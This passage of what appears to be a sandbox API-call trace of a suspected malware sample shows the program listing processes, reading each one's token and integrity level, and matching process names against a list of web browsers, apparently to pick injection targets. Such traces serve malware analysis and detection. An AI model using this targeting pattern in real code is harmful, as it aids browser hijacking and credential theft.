lpString2="reader_sl.exe") returned -1 [0317.310] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0317.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x3d0 [0317.310] OpenProcessToken (in: ProcessHandle=0x3d0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.310] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.310] GetLastError () returned 0x7a [0317.311] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.311] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.311] CloseHandle (hObject=0x444) returned 1 [0317.311] CloseHandle (hObject=0x3d0) returned 1 [0317.311] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x3d0 [0317.311] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247fc0, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.311] OpenProcessToken (in: ProcessHandle=0x3d0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.311] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.311] GetLastError () returned 0x7a [0317.311] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.311] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.311] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.311] CloseHandle (hObject=0x444) returned 1 [0317.311] CloseHandle (hObject=0x3d0) returned 1 [0317.312] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0317.312] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0317.312] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0317.312] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0317.312] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0317.312] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0317.312] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.312] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0319.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xad70) returned 0xc0000004 [0319.324] VirtualAlloc (lpAddress=0x0, dwSize=0xbd70, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0319.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbd70, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0319.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0319.325] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.325] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.325] GetLastError () returned 0x7a [0319.325] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.325] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.325] CloseHandle (hObject=0x444) returned 1 [0319.325] CloseHandle (hObject=0x5b0) returned 1 [0319.325] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0319.325] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x2487a8, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\r") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.325] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.325] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.325] GetLastError () returned 0x7a [0319.325] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.325] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.325] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.325] CloseHandle (hObject=0x444) returned 1 [0319.325] CloseHandle (hObject=0x5b0) returned 1 [0319.325] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0319.325] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0319.325] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0319.325] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0319.325] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0319.325] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0319.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x5b0 [0319.326] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.326] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.326] GetLastError () returned 0x7a [0319.326] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.326] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.326] CloseHandle (hObject=0x444) returned 1 [0319.326] CloseHandle (hObject=0x5b0) returned 1 [0319.326] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x5b0 [0319.326] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246960, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x0e") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.326] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.326] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.326] GetLastError () returned 0x7a [0319.326] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.326] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.326] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.326] CloseHandle (hObject=0x444) returned 1 [0319.326] CloseHandle (hObject=0x5b0) returned 1 [0319.326] lstrcmpiW (lpString1="firefox.exe", lpString2="userinit.exe") returned -1 [0319.326] lstrcmpiW (lpString1="chrome.exe", lpString2="userinit.exe") returned -1 [0319.326] lstrcmpiW (lpString1="opera.exe", lpString2="userinit.exe") returned -1 [0319.326] lstrcmpiW (lpString1="iexplore.exe", lpString2="userinit.exe") returned -1 [0319.326] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="userinit.exe") returned -1 [0319.326] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="userinit.exe") returned -1 [0319.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0319.326] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.326] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.326] GetLastError () returned 0x7a [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.327] CloseHandle (hObject=0x444) returned 1 [0319.327] CloseHandle (hObject=0x5b0) returned 1 [0319.327] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0319.327] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246fe0, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x0f") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.327] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.327] GetLastError () returned 0x7a [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.327] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.327] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.327] CloseHandle (hObject=0x444) returned 1 [0319.327] CloseHandle (hObject=0x5b0) returned 1 [0319.327] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0319.327] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0319.327] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0319.327] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0319.327] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0319.327] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0319.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0319.327] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.327] GetLastError () returned 0x7a [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.327] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.327] CloseHandle (hObject=0x444) returned 1 [0319.327] CloseHandle (hObject=0x5b0) returned 1 [0319.327] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0319.327] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247178, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x10") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.327] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.328] GetLastError () returned 0x7a [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.328] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.328] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.328] CloseHandle (hObject=0x444) returned 1 [0319.328] CloseHandle (hObject=0x5b0) returned 1 [0319.328] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0319.328] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0319.328] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0319.328] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0319.328] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0319.328] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0319.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0319.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0319.328] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.328] GetLastError () returned 0x7a [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.328] CloseHandle (hObject=0x444) returned 1 [0319.328] CloseHandle (hObject=0x5b0) returned 1 [0319.328] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0319.328] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247a80, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x11") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.328] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.328] GetLastError () returned 0x7a [0319.328] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.328] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238ecb1 [0319.328] GetSidSubAuthority (pSid=0x238ecb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238ecb8 [0319.328] CloseHandle (hObject=0x444) returned 1 [0319.328] CloseHandle (hObject=0x5b0) returned 1 [0319.329] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.329] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.329] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0319.329] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.329] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.329] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0319.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0319.329] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0319.329] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0319.329] GetLastError () returned 0x7a [0319.329] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238ef58, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef58, ReturnLength=0x275fc44) returned 1 [0319.329] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0319.329] CloseHandle (hObject=0x444) returned 1 [0319.329] CloseHandle (hObject=0x5b0) returned 1 [0319.329] GetLengthSid (pSid=0x238ef60*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0319.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0319.329] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247e28, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x14\x02\x12") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0319.329] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0319.329] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0319.329] GetLastError () returned 0x7a [0319.329] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eca8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eca8, ReturnLength=0x275fc70) returned 1 [0319.329] GetSidSubAuthorityCount (pSid=0x238ecb0*(Revision=0x1, 